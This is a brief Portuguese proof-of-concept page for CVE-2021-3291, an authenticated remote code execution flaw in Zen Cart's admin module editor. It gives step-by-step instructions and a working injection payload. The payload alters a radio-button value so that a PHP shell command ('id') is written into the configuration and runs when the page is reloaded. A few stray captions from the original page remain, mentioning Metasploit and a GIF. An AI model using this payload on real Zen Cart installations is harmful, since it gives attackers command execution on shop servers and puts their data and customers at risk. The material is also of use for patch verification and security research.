
Exploit autenticado de execução remota de código para Zen Cart via injeção de SQL na edição do módulo admin. Prova de conceito para CVE-2021-3291.
1-) faça login como administrador
2-) acesse a página de edição de qualquer módulo
3-) inspecione o elemento de qualquer radiobox com valor true
4-) altere true para true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //
5-) clique em update
6-) para acionar o comando, acesse novamente a página de edição
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
Exploração
atualizar página
zoom

Metasploit

GIF
